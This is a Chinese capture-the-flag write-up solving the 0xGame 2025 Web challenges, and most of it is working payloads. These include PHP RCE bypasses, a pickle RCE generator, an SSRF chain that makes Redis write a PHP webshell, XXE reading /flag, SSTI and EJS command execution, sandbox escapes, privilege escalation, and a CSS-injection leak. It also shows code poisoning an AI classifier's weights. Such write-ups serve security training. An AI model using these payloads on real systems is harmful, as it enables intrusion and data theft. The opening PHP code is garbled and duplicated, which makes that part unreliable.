Week 1
RCE1
考点:或运算构造 system
<?php (); ();
= []; = []; = [];
= ;
{ ; () (, ); }
(() && ()){
(() === () && !== ){
(!()){ (); } { ; }
} { ; }
} { ; }
2025 0xGame Web 安全挑战赛的解题思路,涵盖 Week 1 至 Week 4 的多道题目。主要涉及 PHP、Python、JavaScript、Java 等多种语言的安全漏洞利用。关键技术点包括:RCE 绕过(或运算、自增)、反序列化(PHP 魔术方法、Pickle、Phar、Shiro)、SSRF(SoapClient、DNS 重绑定)、SSTI(模板注入)、XSS(CSS 注入泄漏)、沙箱逃逸(Tython、栈帧)以及 AI 模型污染。文章提供了详细的 Payload 构造方法和代码示例,帮助理解各类 Web 安全攻防技术。
<?php (); ();
= []; = []; = [];
= ;
{ ; () (, ); }
(() && ()){
(() === () && !== ){
(!()){ (); } { ; }
} { ; }
} { ; }
查根目录文件:print_r(scandir('/'));
利用或运算绕过过滤:(systee|systel)('tac /f???');。或者利用反引号:print(tac /f???);,或者拼接字符串:readfile('/'.'fl'.'ag');
直接查看页面源码获取 flag。
注意最后要求使用 Clash 代理,通过请求头 Via: clash 进行识别。
<?php error_reporting(0); highlight_file(__FILE__);
class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; }
function __destruct() { echo "破绽,在这里!" . $this -> yuzuha; } }
class HSR { public $robin; function __get($robin) { $castorice = $this -> robin; eval($castorice); } }
class HI3rd { public $RaidenMei; public $kiana; public $guanxing;
function __invoke() { if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)) return $this -> guanxing -> Elysia; } }
class GI { public $furina; function __call($arg1, $arg2) { $Charlotte = $this -> furina; return $Charlotte(); } }
class Mi { public $game; function __toString() { $game1 = @$this -> game -> tks(); return $game1; } }
if (isset($_GET['0xGame'])) { $web = unserialize($_GET['0xGame']); throw new Exception("Rubbish_Unser"); }
?>
利用垃圾回收去掉最后一个 } 绕过,Hash 用 Exception 绕过。
from flask import Flask,request,render_template import json import os app = Flask(__name__)
def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
class Dst(): def __init__(self): pass Game0x = Dst()
@app.route('/',methods=['POST', 'GET']) def index(): if request.data: merge(json.loads(request.data), Game0x) return render_template("index.html", Game0x=Game0x)
@app.route("/<path:path>") def render_page(path): if not os.path.exists("templates/" + path): return "Not Found", 404 return render_template(path)
if __name__ == '__main__': app.run(host='0.0.0.0', port=9000)
Payload:
{ "__init__":{ "__globals__":{ "os":{ "path":{ "pardir":"!" } } } } }
admin/admin123 登入,发现网页名字提示是打 XXE。
<!DOCTYPE evil [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>
无过滤无回显 XXE 打完了。
考察 aaEncode 加密。
买 flag 是假的,买 pickle,将折扣改成 0.0001 就行。
Use GET To Send Your Loved Data!!! BlackList = [b'', b''] @app.route('/pickle_dsa') def pic(): data = request.args.get('data') if not data: return "Use GET To Send Your Loved Data" try: data = base64.b64decode(data) except Exception: return "Cao!!!" for b in BlackList: if b in data: return "卡了" p = pickle.loads(data) print(p) return f" Vamos! {p}
打 pickle 反序列化,注意这要用 protocol=0(文本协议),避免包含 0x1E 字节被拦截。
import pickle import base64 import os class P(object): def __reduce__(self): return (eval, ("__import__('os').popen('env').read()",)) payload = pickle.dumps(P(), protocol=0) b64_payload = base64.b64encode(payload) print(payload) print(b64_payload.decode())
题目给了源码,很多办法,用进制绕过就行,这里用 10 进制绕过。
ssrf?url=http://1912930564/&cmd=cat%20/f*
预期解是考 dns 重绑定。
根据 WP 的代码是:
<?php class pure { public $web; public $misc; public $crypto; public $pwn; }
$a = new pure(); $a->web = 'SoapClient'; $a->misc = null; $a->pwn = null;
$target = 'http://127.0.0.1:6379/';
$poc = "AUTH 20251206\r\n" . "CONFIG SET dir /var/www/html/\r\n" . "CONFIG SET dbfilename shell.php\r\n" . "SET x '<?= @eval(\$_POST[1]) ?>'\r\n" . "SAVE";
$a->crypto = array( 'location' => $target, 'uri' => "hello\"\r\n" . $poc . "\r\nhello" );
echo serialize($a);
测试一下 SSTI。
过滤了一些关键词和点:
{{lipsum['__glo''bals__']['o''s']['po''pen']('cat /f*')['re''ad']()}}
输入 ?0xGame=1 得到源码。
需要把换行的都去掉,然后进行一次 URL 编码,因为中间件会解码一次,所以我们构造的 payload 先变成这样。
get 0xGame=1&1=system&2=cat /f* post web=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20
只能上传 png,但是源码提示有个 check.php,上传文件发现文件上传后被删除,但是原文件名出现在 check.php 里,那就是打文件名注入。
果然可以执行命令,然后直接写马连。
import Typhon cmd = "ls /" # Typhon 会把它转为可执行的 Python payload Typhon.bypassRCE( cmd, local_scope={'__builtins__': {'print':print,'list':list,'len':len,'Exception':Exception}}, banned_chr=list("&*^%#${}@!~`·/<>"), max_length=160, interactive=False, print_all_payload=True, log_level='INFO' )
稍微改一下,首先要结果要 +read(),然后要 print 打印出来:
print(list.__class__.__subclasses__(list.__class__)[0].register.__globals__['__builtins__']['__import__']('os').popen('env').read())
使用 Exception 引发异常,并捕获异常对象,异常对象中,有一个 __traceback__ 属性,它指向相关的回溯对象。从回溯对象中,我们可以获取栈帧。然后,从回溯对象中,我们可以访问 tb_frame 来获取当前栈帧,然后 __traceback__.tb_frame.f_back.f_back 获取外层函数 safe_sandbox_Exec 栈帧,利用栈帧的 f_globals 获取原始环境中的 __builtins__,然后执行命令。
发现文件上传和查询文件功能,查/etc/passwd 有回显,有文件包含,直接读源码 index.php。
一眼就知道是 file_get_contents 触发 phar 反序列化,gz 压一下,改一下文件名分别绕过内容 waf 和文件名 waf。
然后打 phar 协议就好了:phar://upload/1.phar.png
这个代码很明显,先 token 伪造然后再原型链污染时间就行。
先说 token 伪造,它这个注册的时候用密钥生成的,但是登入时解 token 没有鉴权,所以直接伪造 admin 就行。
然后将 min_public_time 污染成 8 月 3 号前就行:{"__proto__": { "min_public_time": "2025-08-01" }}
一扫发现一个后门/asdback.php,直接蚁剑连。但是拿不了 flag,提权也不行,一看 start.sh,湾区杯和 N1 写过,打 cp 通配符提权。
cd /var/www/html/primary/ echo "">"-H" ln -s /flag ff cd ../marstream cat f
<%- global.process.mainModule.require('child_process').execSync('env') %>
随便注册一个账户登入,得到 RSA 参数。先 rsa 解密得到 a,响应头看到 b,目录扫描得到 auth,得到 c。直接 uuid8 加密即可。
admin/63727970-746f-849c-8000-0001bae3f741 登入,执行 env 即可。
拿到附件,知道用户密码是 admin/123456,登进去什么也没有,登入抓包结合题目应该是 shiro 反序列化。
目录扫描没发现啥东西,但是密钥一般都在/actuator/heapdump,访问得到,然后用工具解密。
得到 qebXusiEQHNsQq+TDqfsFQ==。
然后爆破利用链执行命令就行。
flask 框架,尝试发现过滤了{}<>,那肯定打 bottle 的 python 代码执行,就打 abort 吧。 由于过滤了<>,用引号包裹绕过语法检测。
''' % from bottle import abort % a=__import__('os').popen("ls /").read() % abort(404,a) % end '''
wp 的方法其实就是文档中讲的另一种形式,也学习一下,其实也差不多。
这题就是下面 app.js 与 bot.js 有用。
这里显然当 admin 登进就会有 flag,但是打不了 session 伪造,看看 bot.js,作用就是让 admin 身份的 bot 访问 url,而这个 url 就是 app.js 中 report 路由中的参数,有什么?这里利用 CSS 注入实现 XS Leak,一个常见的方法是利⽤ CSS 选择器匹配指定标签的某个属性的内容。
而在 view 页面中:<meta readonly name="secret" content="<%- locals.secret %>">
当 admin 用户访问时,flag 会被放在 meta 标签中,也就是说,我们构造恶意 css 语句,让 bot 去访问/view/:id 路由,然后 bot 的 view 页面包含 flag,然后我们利用 css 注入接收泄露的 flag。
所有代码如下 exp.html 和 Flask 辅助脚本。
看不懂,直接看 wp,加载原始模型,找到输出层,污染输出层权重和偏置,保存污染后的模型。
import torch from model_server import SimpleDessertClassifier # 加载原始模型 model = SimpleDessertClassifier() sd = model.state_dict() # 找到输出层 last_linear_weight = None last_linear_bias = None for k in sorted(sd.keys()): if k.endswith('.weight') and sd[k].shape[0] == 3: last_linear_weight = k last_linear_bias = k.replace('.weight', '.bias') break if last_linear_weight is None: raise RuntimeError("未能找到输出层 Linear") # 污染输出层 sd[last_linear_weight] = torch.zeros_like(sd[last_linear_weight]) sd[last_linear_bias] = torch.tensor([-10.0, 10.0, 0.0]) # 保存污染后的模型 torch.save(sd, "poisoned_fixed.pth")

微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
生成新的随机RSA私钥和公钥pem证书。 在线工具,RSA密钥对生成器在线工具,online
查找任何按下的键的javascript键代码、代码、位置和修饰符。 在线工具,Keycode 信息在线工具,online
JavaScript 字符串转义/反转义;Java 风格 \uXXXX(Native2Ascii)编码与解码。 在线工具,Escape 与 Native 编解码在线工具,online
基于 Mermaid.js 实时预览流程图、时序图等图表,支持源码编辑与即时渲染。 在线工具,Mermaid 预览与可视化编辑在线工具,online
使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。 在线工具,JavaScript / HTML 格式化在线工具,online
Terser 压缩、变量名混淆,或 javascript-obfuscator 高强度混淆(体积会增大)。 在线工具,JavaScript 压缩与混淆在线工具,online